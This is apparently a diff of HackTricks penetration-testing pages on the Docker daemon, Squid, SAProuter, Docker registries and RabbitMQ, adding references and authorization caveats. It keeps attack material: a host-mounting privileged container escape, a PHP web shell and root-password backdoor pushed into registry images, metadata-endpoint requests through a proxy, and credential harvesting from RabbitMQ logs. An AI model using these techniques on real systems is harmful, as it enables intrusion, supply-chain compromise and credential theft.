-../linux-hardening/containers-namespaces/container-security/
-{{#endref}}
-
-Abusing this it's possible to escape form a container, you could run a weak container in the remote machine, escape from it, and compromise the machine:
+With daemon access, you do not need a kernel-level escape: you can ask Docker to start a privileged container with the host filesystem mounted, then operate on that filesystem directly:
 
 ```bash
 docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
@@ -261,7 +256,7 @@ If you are inside a host that is using docker, you may [**read this information 
 ### Discovering secrets in running Docker containers
 
 ```bash
-docker ps [| grep <kubernetes_service_name>]
+docker ps | grep <kubernetes_service_name>
 docker inspect <docker_id>
 ```
 
@@ -276,7 +271,7 @@ Check **env** (environment variable section) for secrets and you may find:
 If you want to extract a file:
 
 ```bash
-docker cp <docket_id>:/etc/<secret_01> <secret_01>
+docker cp <docker_id>:/etc/<secret_01> <secret_01>
 ```
 
 ### Securing your Docker
@@ -373,10 +368,12 @@ You can use auditd to monitor docker.
 ## References
 
 - [1] [Why Podman is worth a look - ti8m](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html)
-- [2] [How does containerd compare to runc? - Stack Overflow](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
+- [2] [containerd project overview and features](https://github.com/containerd/containerd)
 - [3] [Abusing Docker API Socket - Security Boulevard](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
 - [4] [0xdf - HTB MonitorsFour](https://0xdf.gitlab.io/2026/05/23/htb-monitorsfour.html)
 - [5] [Docker security announcements - Docker Desktop 4.44.3 / CVE-2025-9074](https://docs.docker.com/security/security-announcements/)
 - [6] [NVD - CVE-2025-9074](https://nvd.nist.gov/vuln/detail/CVE-2025-9074)
+- [7] [Docker Docs - Protect the Docker daemon socket](https://docs.docker.com/engine/security/protect-access/)
+- [8] [Docker Engine API reference](https://docs.docker.com/reference/api/engine/)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/3128-pentesting-squid.md
+++ b/src/network-services-pentesting/3128-pentesting-squid.md
@@ -4,9 +4,7 @@
 
 ## Basic Information
 
-From [Wikipedia](<https://en.wikipedia.org/wiki/Squid_(software)>):
-
-> **Squid** is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching web, DNS and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic. Although primarily used for HTTP and FTP, Squid includes limited support for several other protocols including Internet Gopher, SSL, TLS and HTTPS. Squid does not support the SOCKS protocol, unlike Privoxy, with which Squid can be used in order to provide SOCKS support.
+**Squid** is a caching and forwarding HTTP proxy. Deployments use it for outbound access control, caching, reverse-proxy acceleration, and traffic filtering. It is an HTTP proxy rather than a SOCKS proxy, and TCP tunnelling is controlled through HTTP `CONNECT` and Squid ACLs. Port **3128** is conventional, but `http_port` is configurable.<sup>[[5]](#references)</sup>
 
 **Default port:** 3128
 
@@ -19,7 +17,7 @@ PORT     STATE  SERVICE      VERSION
 
 ### Web Proxy
 
-You can try to set this discovered service as proxy in your browser. However, if it's configured with HTTP authentication you will be prompted for usernames and password.
+You can configure the discovered service as an HTTP proxy in your browser. If it requires proxy authentication, the client will prompt for a username and password.
 
 ```bash
 # Try to proxify curl
@@ -35,7 +33,7 @@ First verify whether it is really behaving as a forward proxy and whether outbou
 nmap -Pn -sV -p 3128 --script http-open-proxy <IP>
 
 # Confirm egress and learn the public IP used by the proxy
-curl -x http://<IP>:3128 https://ifconfig.me -I
+curl -x http://<IP>:3128 https://ifconfig.me
 
 # If authentication is required, curl will usually show 407 Proxy Authentication Required
 curl -x http://<IP>:3128 http://example.com -v
@@ -46,11 +44,11 @@ If the proxy is reachable but Internet egress is blocked, it may still be useful
 
 ### Nmap proxified
 
-You can also try to abuse the proxy to **scan internal ports proxifying nmap**.\
+You can also try to use the proxy to **scan internal TCP ports through Nmap**.\
 Configure proxychains to use the Squid proxy by adding the following line at the end of the `proxychains.conf` file: `http 10.10.10.10 3128`
 For proxies requiring authentication, append credentials to the configuration by including the username and password at the end: `http 10.10.10.10 3128 username passw0rd`.
 
-Then run nmap with proxychains to **scan the host from local**: `proxychains nmap -sT -n -p- localhost`
+Then run Nmap with proxychains to scan from the proxy's perspective: `proxychains nmap -sT -Pn -n -p- localhost`. Proxychains only intercepts compatible TCP `connect()` calls, so avoid SYN/UDP scans and validate results manually because proxy errors can produce misleading port states.
 
 ### SPOSE Scanner
 
@@ -79,7 +77,7 @@ curl http://<IP>:3128/squid-internal-mgr/active_requests
 curl -u any:PASSWORD http://<IP>:3128/squid-internal-mgr/config
 ```
 
-Older installations may also expose the historical `cache_object://` scheme through `squidclient`/`curl`. If manager ACLs are weak, treat this like a sensitive administrative surface.
+Older installations may also expose the historical `cache_object://` scheme through `squidclient`/`curl`; that scheme was removed during the Squid 6 series. If manager ACLs are weak, treat this as a sensitive administrative surface.<sup>[[2]](#references)</sup>
 
 ### ACL bypass / internal reachability tests
 
@@ -92,7 +90,7 @@ curl -x http://<IP>:3128 http://[::1]:8080/ -v
 curl -x http://<IP>:3128 http://169.254.169.254/latest/meta-data/ -v
 curl -x http://<IP>:3128 http://192.168.1.10:8000/ -v
 
-# Force a CONNECT tunnel to a normally unreachable service
+# Force a CONNECT tunnel and perform a TLS handshake with an internal TLS service
 openssl s_client -proxy <IP>:3128 -connect 127.0.0.1:443 -quiet
 openssl s_client -proxy <IP>:3128 -connect 10.10.10.20:8443 -quiet
 ```
@@ -142,5 +140,6 @@ If you are **auditing Squid itself** (not just using it as a pivot), include the
 - [2] [The Cache Manager - Squid Web Cache wiki](https://wiki.squid-cache.org/Features/CacheManager/Index)
 - [3] [Squid Caching Proxy Security Audit: 55 vulnerabilities and 35 0days](https://megamansec.github.io/Squid-Security-Audit/)
 - [4] [HTB Bamboo walkthrough (Squid pivoting example)](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html)
+- [5] [Squid Web Cache wiki - configuring browsers and the default proxy port](https://wiki.squid-cache.org/SquidFaq/ConfiguringBrowsers)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/3299-pentesting-saprouter.md
+++ b/src/network-services-pentesting/3299-pentesting-saprouter.md
@@ -1,4 +1,4 @@
-# # 3299/tcp - Pentesting SAProuter
+# 3299/tcp - Pentesting SAProuter
 
 {{#include ../banners/hacktricks-training.md}}
 
@@ -7,15 +7,15 @@ PORT     STATE SERVICE    VERSION
 3299/tcp open  saprouter?
 ```
 
-This is a summary of the post from [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/)<sup>[[1]](#references)[[3]](#references)</sup>
+The Metasploit workflow below is based on Rapid7's SAProuter research.<sup>[[1]](#references)</sup>
 
 ## Understanding SAProuter Penetration with Metasploit
 
-SAProuter acts as a reverse proxy for SAP systems, primarily to control access between the internet and internal SAP networks. It's commonly exposed to the internet by allowing TCP port 3299 through organizational firewalls. This setup makes SAProuter an attractive target for penetration testing because it might serve as a gateway to high-value internal networks.
+SAProuter is an application-level gateway for SAP network traffic. It uses a route permission table (`saprouttab`) to decide which source may reach which host and service, and its default listener is TCP/3299. It complements rather than replaces a firewall.<sup>[[3]](#references)</sup>
 
 **Scanning and Information Gathering**
 
-Initially, a scan is performed to identify if a SAP router is running on a given IP using the **sap_service_discovery** module. This step is crucial for establishing the presence of a SAP router and its open port.
+First, use the **sap_service_discovery** module to identify SAP services and confirm whether SAProuter is present.
 
 ```text
 msf> use auxiliary/scanner/sap/sap_service_discovery
@@ -73,11 +73,9 @@ For more detailed information on Metasploit modules and their usage, visit [Rapi
 
 ---
 
-## Recent Vulnerabilities (2022-2025)
+## CVE-2022-27668 – Improper Access Control ➜ Remote Administrative Command Execution
 
-### CVE-2022-27668 – Improper Access Control ➜ Remote Administrative Command Execution
-
-In June 2022 SAP released Security Note **3158375** addressing a critical flaw (CVSS 9.8) in SAProuter (all kernels ≥ 7.22). An unauthenticated attacker can abuse permissive `saprouttab` entries to **send administration packets** (e.g. *shutdown*, *trace-level*, *connection-kill*) from a remote host, even when the router was started without the `-X` remote-admin option.
+In June 2022, SAP released Security Note **3158375** for a critical improper-access-control flaw in the SAProuter versions listed below. When `saprouttab` permits the necessary route, an unauthenticated remote attacker can tunnel administrative packets such as *shutdown*, *trace-level*, and *connection-kill* to the router even when it was started without the `-X` remote-administration option.<sup>[[2]](#references)</sup>
 
 The issue results from the possibility to build a tunnel to the router’s own loopback interface by targeting the unspecified address **0.0.0.0**. Once the tunnel is established, the attacker gains local-host privileges and can run any admin command.<sup>[[2]](#references)</sup>
 
@@ -108,7 +106,7 @@ python router_admin.py -s -d 127.0.0.1 -p 3299
 
 ## Updated Tooling & Tricks
 
-* **pysap** – actively maintained and provides `router_portfw.py`, `router_admin.py` & `router_trace.py` for crafting custom NI/Router packets, fuzzing ACLs or automating the CVE-2022-27668 exploit.
+* **pysap** provides `router_portfw.py`, `router_admin.py`, and `router_trace.py` for crafting NI/Router packets, testing ACLs, and reproducing CVE-2022-27668 in an authorized lab.<sup>[[4]](#references)</sup>
 * **Nmap** – extend service detection by adding the custom SAProuter probe:
 
   ```text
@@ -127,8 +125,8 @@ python router_admin.py -s -d 127.0.0.1 -p 3299
 * Filter port **3299/TCP** on the perimeter firewall – allow traffic only from trusted SAP support networks.
 * Keep SAProuter **fully patched**; verify with `saprouter -v` and compare against the latest kernel patch level.
 * Use **strict, host-specific** entries in `saprouttab`; avoid `*` wildcards and deny `P`/`S` rules that target arbitrary hosts or ports.
-* Start the service with **`-S <secudir>` + SNC** to enforce encryption and mutual authentication.
-* Disable remote administration (`-X`) and, if possible, bind the listener to `127.0.0.1` while using an external reverse proxy for required traffic.
+* Configure an SNC environment, start each SAProuter with **`-K <snc-name>`**, and use `KT` plus `KP`/`KD`/`KS` route-table entries where adjacent SAProuters must authenticate and encrypt traffic.<sup>[[3]](#references)</sup>
+* Disable remote administration (`-X`) and use **`-H <hostname-or-address>`** to bind only the required interface instead of listening on every local address.<sup>[[3]](#references)</sup>
 * Monitor the **dev_rout** log for suspicious `ROUTER_ADM` packets or unexpected `NI_ROUTE` requests to `0.0.0.0`.
 
 ---
@@ -141,6 +139,7 @@ python router_admin.py -s -d 127.0.0.1 -p 3299
 
 - [1] [Piercing SAProuter with Metasploit](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/)
 - [2] [Improper Access Control in SAP® SAProuter (CVE-2022-27668)](https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/)
-- [3] [blog.rapid7.com - Piercing Saprouter With Metasploit](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit)
+- [3] [SAP Help - Introduction to SAProuter and route permission tables](https://help.sap.com/docs/SAP_NETWEAVER_701/ba627ada0df549ab97b2d7a2c1a79b68/48ce58b318d3424be10000000a421937.html)
+- [4] [pysap documentation](https://pysap.readthedocs.io/en/latest/)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/5000-pentesting-docker-registry.md
+++ b/src/network-services-pentesting/5000-pentesting-docker-registry.md
@@ -4,9 +4,9 @@
 
 ## Basic Information
 
-A storage and distribution system known as a **Docker registry** is in place for Docker images that are named and may come in multiple versions, distinguished by tags. These images are organized within **Docker repositories** in the registry, each repository storing various versions of a specific image. The functionality provided allows for images to be downloaded locally or uploaded to the registry, assuming the user has the necessary permissions.
+A container **registry** stores and distributes named images and other OCI content. Repositories contain manifests referenced by tags or immutable digests, while the manifests point to configuration and layer blobs. Authorized clients pull and push this content through the registry API.<sup>[[1]](#references)[[3]](#references)</sup>
 
-**DockerHub** serves as the default public registry for Docker, but users also have the option to operate an on-premise version of the open-source Docker registry/distribution or opt for the commercially supported **Docker Trusted Registry**. Additionally, various other public registries can be found online.<sup>[[1]](#references)</sup>
+**Docker Hub** is Docker's default public registry. Organizations can also run the open-source CNCF Distribution registry or use other hosted/private OCI-compatible services. Docker Trusted Registry is a historical product name; current environments may expose successor or vendor-specific registry products.<sup>[[1]](#references)</sup>
 
 To download an image from an on-premise registry, the following command is used:
 
@@ -29,11 +29,9 @@ PORT    STATE SERVICE  VERSION
 
 ## Discovering
 
-The easiest way to discover this service running is get it on the output of nmap. Anyway, note that as it's a HTTP based service it can be behind HTTP proxies and nmap won't detect it.\
-Some fingerprints:
+Nmap service detection can identify a directly exposed registry, but an HTTP reverse proxy or non-standard path/port may hide the backend. Prefer the version-check endpoint as the protocol fingerprint:<sup>[[3]](#references)</sup>
 
-- If you access `/` nothing is returned in the response
-- If you access `/v2/` then `{}` is returned
+- A request to `/v2/` should return `200 OK` when the V2 API is available or `401 Unauthorized` when authentication is required; either response should carry `Docker-Distribution-API-Version: registry/2.0`. The response body is implementation-dependent.
 - If you access `/v2/_catalog` you may obtain:
   - `{"repositories":["alpine","ubuntu"]}`
   - `{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}`
@@ -42,22 +40,17 @@ Some fingerprints:
 
 ### HTTP/HTTPS
 
-Docker registry may be configured to use **HTTP** or **HTTPS**. So the first thing you may need to do is **find which one** is being configured:
+Registries may be exposed over **HTTP** in a lab or **HTTPS** in production. Test both schemes explicitly; production deployments should use TLS and access control.<sup>[[4]](#references)</sup>
 
 ```bash
-curl -s http://10.10.10.10:5000/v2/_catalog
-#If HTTPS
-Warning: Binary output can mess up your terminal. Use "--output -" to tell
-Warning: curl to output it to your terminal anyway, or consider "--output
-Warning: <FILE>" to save to a file.
-
-#If HTTP
-{"repositories":["alpine","ubuntu"]}
+curl -i http://10.10.10.10:5000/v2/
+curl -ki https://10.10.10.10:5000/v2/
+curl -ks https://10.10.10.10:5000/v2/_catalog
 ```
 
 ### Authentication
 
-Docker registry may also be configured to require **authentication**:
+A registry may require **authentication** and may authorize access per repository/action:<sup>[[3]](#references)</sup>
 
 ```bash
 curl -k https://192.25.197.3:5000/v2/_catalog
@@ -67,7 +60,7 @@ curl -k https://192.25.197.3:5000/v2/_catalog
 {"repositories":["alpine","ubuntu"]}
 ```
 
-If the Docker Registry is requiring authentication you can[ **try to brute force it using this**](../generic-hacking/brute-force.md#docker-registry).\
+If the Docker Registry requires authentication, you can [test credentials as described here](../generic-hacking/brute-force.md#docker-registry). Avoid account lockouts and high request volume.\
 **If you find valid credentials you will need to use them** to enumerate the registry, in `curl` you can use them like this:
 
 ```bash
@@ -76,7 +69,7 @@ curl -k -u username:password https://10.10.10.10:5000/v2/_catalog
 
 ### Enumeration using DockerRegistryGrabber
 
-[DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber) is a python tool to enumerate / dump docker degistry (without or with basic authentication)<sup>[[2]](#references)</sup>
+[DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber) is a Python tool for enumerating or dumping a registry with no authentication, Basic authentication, or a supplied bearer token.<sup>[[2]](#references)</sup>
 
 ```bash
 usage: drg.py [-h] [-p port] [-U USERNAME] [-P PASSWORD] [-A header] [--list | --dump_all | --dump DOCKERNAME] url
@@ -154,7 +147,7 @@ python3 DockerGraber.py http://127.0.0.1  --dump_all
 
 ### Enumeration using curl
 
-Once you **obtained access to the docker registry** here are some commands you can use to enumerate it:
+After obtaining access to the registry, use the V2 API endpoints below to enumerate it.<sup>[[3]](#references)</sup>
 
 ```bash
 #List repositories
@@ -165,8 +158,10 @@ curl -s http://10.10.10.10:5000/v2/_catalog
 curl -s http://192.251.36.3:5000/v2/ubuntu/tags/list
 {"name":"ubuntu","tags":["14.04","12.04","18.04","16.04"]}
 
-#Get manifests
-curl -s http://192.251.36.3:5000/v2/ubuntu/manifests/latest
+# Get a manifest (the Accept header below requests the modern OCI/Docker v2 formats)
+curl -s -H 'Accept: application/vnd.oci.image.manifest.v1+json, application/vnd.docker.distribution.manifest.v2+json' \
+  http://192.251.36.3:5000/v2/ubuntu/manifests/latest
+# A legacy schema-1 response can instead look like this:
 {
    "schemaVersion": 1,
    "name": "ubuntu",
@@ -213,14 +208,15 @@ curl -s http://192.251.36.3:5000/v2/ubuntu/manifests/latest
 }
 
 #Download one of the previously listed blobs
-curl http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935 --output blob1.tar
+curl -L http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935 --output blob1.tar
 
 #Inspect the insides of each blob
-tar -xf blob1.tar #After this,inspect the new folders and files created in the current directory
+tar -tf blob1.tar # Inspect names first
+mkdir blob1 && tar -xf blob1.tar -C blob1
 ```
 
 > [!WARNING]
-> Note that when you download and decompress the blobs files and folders will appear in the current directory. **If you download all the blobs and decompress them in the same folder they will overwrite values from the previously decompressed blobs**, so be careful. It may be interesting to decompress each blob inside a different folder to inspect the exact content of each blob.
+> Downloaded layers are untrusted archives. List their entries first, inspect for absolute paths or `..` traversal, and extract each layer into a separate disposable directory. Extracting every layer into one directory can overwrite files from earlier layers and also loses the layer-by-layer history.
 
 ### Enumeration using docker
 
@@ -240,24 +236,24 @@ docker history 10.10.10.10:5000/ubuntu
 #Run and get a shell
 docker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell running
 docker ps #Using a different shell
-docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container
+docker exec -it 7d3a81fe42d7 bash # Get a Bash shell (use /bin/sh for minimal images)
 ```
 
 ### Backdooring WordPress image
 
-In the scenario where you have found a Docker Registry saving a wordpress image you can backdoor it.\
+If an authorized test confirms that you can push to a repository consumed by a deployment, you can demonstrate image-supply-chain impact by adding a test backdoor. Use a disposable tag whenever possible; overwriting a production tag can disrupt or compromise downstream systems.\
 **Create** the **backdoor**:
 
-```bash:shell.php
+```php
 <?php echo shell_exec($_GET["cmd"]); ?>
 ```
 
 Create a **Dockerfile**:
 
-```bash:Dockerfile
+```dockerfile
 FROM 10.10.10.10:5000/wordpress
 COPY shell.php /app/
-RUN chmod 777 /app/shell.php
+RUN chmod 0644 /app/shell.php
 ```
 
 **Create** the new image, **check** it's created, and **push** it:
@@ -266,12 +262,12 @@ RUN chmod 777 /app/shell.php
 docker build -t 10.10.10.10:5000/wordpress .
  #Create
 docker images
-docker push registry:5000/wordpress #Push it
+docker push 10.10.10.10:5000/wordpress # Push it
 ```
 
 ### Backdooring SSH server image
 
-Suppose that you found a Docker Registry with a SSH image and you want to backdoor it.\
+The same write-access test can be demonstrated against an SSH server image. Only perform this against an explicitly authorized, non-production tag.\
 **Download** the image and **run** it:
 
 ```bash
@@ -307,12 +303,14 @@ RUN echo root:password | chpasswd
 docker build -t 10.10.10.10:5000/sshd-docker-cli .
  #Create
 docker images
-docker push registry:5000/sshd-docker-cli #Push it
+docker push 10.10.10.10:5000/sshd-docker-cli # Push it
 ```
 
 ## References
 
-- [1] [What Is a Docker Registry? - Aqua Security Cloud Native Academy](https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/)
+- [1] [CNCF Distribution - About Registry](https://distribution.github.io/distribution/about/)
 - [2] [DockerRegistryGrabber - Docker Registry grabber tool](https://github.com/Syzik/DockerRegistryGrabber)
+- [3] [CNCF Distribution - HTTP API V2 specification](https://distribution.github.io/distribution/spec/api/)
+- [4] [CNCF Distribution - Deploy a registry server](https://distribution.github.io/distribution/about/deploying/)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/5671-5672-pentesting-amqp.md
+++ b/src/network-services-pentesting/5671-5672-pentesting-amqp.md
@@ -4,13 +4,9 @@
 
 ## Basic Information
 
-From [cloudamqp](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html):<sup>[[1]](#references)</sup>
+**RabbitMQ** is a message and streaming broker. Producers publish messages to exchanges, exchanges route them to queues or streams, and consumers receive them. RabbitMQ supports AMQP 0-9-1 and, since RabbitMQ 4.0, native AMQP 1.0 on the same listeners, plus optional protocol plugins.<sup>[[1]](#references)[[11]](#references)</sup>
 
-> **RabbitMQ** is a **message-queueing software** also known as a _message broker_ or _queue manager._ Simply said; it is software where queues are defined, to which applications connect in order to transfer a message or messages.\
-> A **message can include any kind of information**. It could, for example, have information about a process or task that should start on another application (which could even be on another server), or it could be just a simple text message. The queue-manager software stores the messages until a receiving application connects and takes a message off the queue. The receiving application then processes the message.\
-> Definition from .<sup>[[1]](#references)</sup>
-
-**Default port**: 5672,5671
+**Default ports:** 5672 for plain AMQP and 5671 for AMQP over TLS.<sup>[[2]](#references)</sup>
 
 ```
 PORT     STATE SERVICE VERSION
@@ -19,7 +15,7 @@ PORT     STATE SERVICE VERSION
 
 - **Default credentials**: `guest:guest`. RabbitMQ restricts them to localhost through `loopback_users`, but many Docker/IoT images disable that check, so always test remote login before assuming it is blocked.
 - **Authentication mechanisms**: PLAIN and AMQPLAIN are enabled by default, ANONYMOUS is mapped to `anonymous_login_user`/`anonymous_login_pass`, and EXTERNAL (x509) can be exposed when TLS is enabled. Enumerate what the broker advertises so you know whether to try password spraying or certificate impersonation later.<sup>[[3]](#references)</sup>
-- **AMQP 1.0 on the same listener**: RabbitMQ 4.x can expose native AMQP 1.0 on `5672/5671` too. If you find an AMQP 1.0-capable client, bridge, or SSRF primitive, remember that targeting `/queues/<queue>` sends directly to an existing queue through the internal `amq.default` exchange, which is handy when you know queue names but cannot declare new topology.
+- **AMQP 1.0 on the same listener**: RabbitMQ 4.x exposes native AMQP 1.0 on `5672/5671`. Targeting `/queues/<queue>` sends to an existing queue through the internal `amq.default` exchange; the user still needs write permission on `amq.default`, and the queue must exist.<sup>[[11]](#references)</sup>
 
 ## Enumeration
 
@@ -37,7 +33,7 @@ for k, v in conn.server_properties.items():
 
 Once authenticated, dump `conn.server_properties`, `conn.channel_max` and `conn.frame_max` to understand throughput limits and whether you can exhaust resources with oversized frames.
 
-Starting with RabbitMQ **4.3.1**, **passive** `queue.declare` / `exchange.declare` calls require at least one permission on the target object, which turns them into a low-noise privilege oracle: a `NOT_FOUND` vs `ACCESS_REFUSED` split tells you whether the object exists and whether your current user has any access to it. This is useful when you want to enumerate queue names without creating new broker artifacts.
+Starting with RabbitMQ **4.3.1**, **passive** `queue.declare` / `exchange.declare` calls require at least one matching permission (`configure`, `write`, or `read`) on the target object. They do not create topology, and differences between `NOT_FOUND` and `ACCESS_REFUSED` can help distinguish nonexistent names from names outside the account's permission regex.<sup>[[12]](#references)</sup>
 
 ### Automatic
 
@@ -84,7 +80,7 @@ PORT     STATE SERVICE VERSION
 
 ### Queue deletion without configure perms (CVE-2024-51988)
 
-RabbitMQ ≤ 3.12.10 (and unpatched Tanzu builds) fail to check the `configure` permission when queues are deleted via the HTTP API. Any authenticated user with access to the target vhost can nuke arbitrary queues even if they only have `read` or `write` rights.<sup>[[4]](#references)</sup>
+Open-source RabbitMQ versions **after 3.12.7 and before 3.12.11** fail to check the `configure` permission when queues are deleted through the HTTP API. An authenticated user with some permission on the target vhost and HTTP API access can delete queues for which it lacks deletion permission. RabbitMQ 3.12.11 fixes the issue; Tanzu version ranges differ, so consult the advisory.<sup>[[4]](#references)</sup>
 
 ```bash
 # confirm vulnerable version first
@@ -97,14 +93,14 @@ Combine this with `rabbitmqadmin list permissions` to find vhosts where your low
 
 ### Harvest credentials from RabbitMQ logs (CVE-2025-50200)
 
-Until 4.0.8/4.1.0, hitting the management API with HTTP basic auth on a non-existent resource causes the broker to log the entire `Authorization` header (base64). If you gain limited filesystem access (e.g. Docker escape, plugin RCE), search `/var/log/rabbitmq/rabbit@*.log` for `Authorization:` and recover credentials for other tenants or service accounts.<sup>[[5]](#references)</sup>
+RabbitMQ **3.13.0–3.13.7** and **4.0.0–4.0.7** can log the complete HTTP Basic `Authorization` header when a management API request raises certain errors, such as a lookup for a nonexistent queue. Patched versions are 3.13.8 and 4.0.8. If you gain authorized filesystem access, search the RabbitMQ logs for leaked credentials belonging to users whose requests triggered the affected error path.<sup>[[5]](#references)</sup>
 
 ```bash
 curl -k -u pentester:SuperSecret https://target:15672/api/queues/%2f/ghost
 sudo grep -R "Authorization:" /var/log/rabbitmq | cut -d' ' -f3 | base64 -d
 ```
 
-Trigger this intentionally with bogus endpoints to plant fresh secrets in the logs, then pivot by reusing the decoded creds over AMQP, STOMP, MQTT or the OS itself.
+Correlate any decoded value with its timestamp and request context, then test reuse only within scope over AMQP, STOMP, MQTT, or the management API. Avoid deliberately submitting third-party credentials to the vulnerable endpoint because that creates another plaintext copy in the logs.
 
 ### Weaponize rabbitmqadmin-ng
 
@@ -122,11 +118,11 @@ rabbitmqadmin shovels declare_amqp091 \
   --destination-queue stolen
 ```
 
-Because the tool supports blue/green aware health checks, you can also abuse `rabbitmqadmin health_check port_listener --port 5672` to remotely confirm whether TLS listeners were exposed or to keep the service busy for timing probes.
+The tool's health checks can also ask the management API whether a node listens on a given port, for example `rabbitmqadmin health_check port_listener --port 5672`. This reports listener presence; it does not by itself prove that the listener is plaintext, TLS-enabled, or externally reachable.
 
 ### Message hijacking/sniffing
 
-If you find permissive policies (`.*` bindings, `topic` exchanges, or `x-queue-master-locator = min-masters`), you can quietly siphon messages without deleting them:
+If permissions allow broad bindings to topic exchanges, you can copy matching messages into a temporary queue without consuming them from the original queue. Creating the queue requires `configure`, binding it requires `write` on the exchange and `read` on the queue, and consuming requires `read` on the queue.<sup>[[3]](#references)</sup>
 
 ```python
 import pika
@@ -220,22 +216,20 @@ The same pattern appears outside AMQP. In Kafka, once you can reach the broker a
 
 In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) you can find that **rabbitmq uses several ports**:<sup>[[2]](#references)</sup>
 
-- **1883, 8883**: ([MQTT clients](http://mqtt.org) without and with TLS, if the [MQTT plugin](https://www.rabbitmq.com/mqtt.html) is enabled. [**Learn more about how to pentest MQTT here**](1883-pentesting-mqtt-mosquitto.md).
+- **1883, 8883**: [MQTT clients](https://mqtt.org) without and with TLS, if the [MQTT plugin](https://www.rabbitmq.com/mqtt.html) is enabled. [Learn how to pentest MQTT here](1883-pentesting-mqtt-mosquitto.md).
 - **4369: epmd**, a peer discovery service used by RabbitMQ nodes and CLI tools. [**Learn more about how to pentest this service here**](4369-pentesting-erlang-port-mapper-daemon-epmd.md).
 - **5672, 5671**: used by AMQP 0-9-1 and 1.0 clients without and with TLS
 - **15672**: [HTTP API](https://www.rabbitmq.com/management.html) clients, [management UI](https://www.rabbitmq.com/management.html) and [rabbitmqadmin](https://www.rabbitmq.com/management-cli.html) (only if the [management plugin](https://www.rabbitmq.com/management.html) is enabled). [**Learn more about how to pentest this service here**](15672-pentesting-rabbitmq-management.md).
 - 15674: STOMP-over-WebSockets clients (only if the [Web STOMP plugin](https://www.rabbitmq.com/web-stomp.html) is enabled)
 - 15675: MQTT-over-WebSockets clients (only if the [Web MQTT plugin](https://www.rabbitmq.com/web-mqtt.html) is enabled)
 - 15692: Prometheus metrics (only if the [Prometheus plugin](https://www.rabbitmq.com/prometheus.html) is enabled)
-- 25672: used for inter-node and CLI tools communication (Erlang distribution server port) and is allocated from a dynamic range (limited to a single port by default, computed as AMQP port + 20000). Unless external connections on these ports are really necessary (e.g. the cluster uses [federation](https://www.rabbitmq.com/federation.html) or CLI tools are used on machines outside the subnet), these ports should not be publicly exposed. See [networking guide](https://www.rabbitmq.com/networking.html) for details. **Only 9 of these ports opened on the internet**.<sup>[[2]](#references)</sup>
+- 25672: used for inter-node and CLI-tool communication (the Erlang distribution server port) and allocated from a dynamic range, limited to one port by default and commonly computed as the AMQP port plus 20000. Unless external connections are required, it should not be publicly exposed.<sup>[[2]](#references)</sup>
 - 35672-35682: used by CLI tools (Erlang distribution client ports) for communication with nodes and is allocated from a dynamic range (computed as server distribution port + 10000 through server distribution port + 10010). See [networking guide](https://www.rabbitmq.com/networking.html) for details.<sup>[[2]](#references)</sup>
-- 61613, 61614: [STOMP clients](https://stomp.github.io/stomp-specification-1.2.html) without and with TLS (only if the [STOMP plugin](https://www.rabbitmq.com/stomp.html) is enabled). Less than 10 devices with this port open and mostly UDP for DHT nodes.
+- 61613, 61614: [STOMP clients](https://stomp.github.io/stomp-specification-1.2.html) without and with TLS (only if the [STOMP plugin](https://www.rabbitmq.com/stomp.html) is enabled).
 
 ## See also
 
-{{#ref}}
-4222-pentesting-nats.md
-{{#endref}}
+See [NATS pentesting](4222-pentesting-nats.md).
 
 ## Shodan
 
@@ -246,12 +240,14 @@ In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networkin
 - [1] [CloudAMQP – RabbitMQ for beginners](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html)
 - [2] [RabbitMQ Networking Guide](https://www.rabbitmq.com/networking.html)
 - [3] [RabbitMQ Authentication, Authorisation & Access Control](https://www.rabbitmq.com/docs/access-control)
-- [4] [CVE-2024-51988 – RabbitMQ HTTP API queue deletion bug](https://www.cve.news/cve-2024-51988/)
+- [4] [RabbitMQ advisory GHSA-pj33-75x5-32j4 / CVE-2024-51988](https://github.com/rabbitmq/rabbitmq-server/security/advisories/GHSA-pj33-75x5-32j4)
 - [5] [GHSA-gh3x-4x42-fvq8 – RabbitMQ logs Authorization header](https://github.com/rabbitmq/rabbitmq-server/security/advisories/GHSA-gh3x-4x42-fvq8)
 - [6] [rabbitmqadmin v2 (rabbitmqadmin-ng)](https://github.com/rabbitmq/rabbitmqadmin-ng)
 - [7] [RabbitMQ Streams and Superstreams](https://www.rabbitmq.com/docs/streams)
 - [8] [RabbitMQ Event Exchange Plugin](https://www.rabbitmq.com/docs/event-exchange)
 - [9] [Apache Kafka Protocol Guide](https://kafka.apache.org/41/design/protocol/)
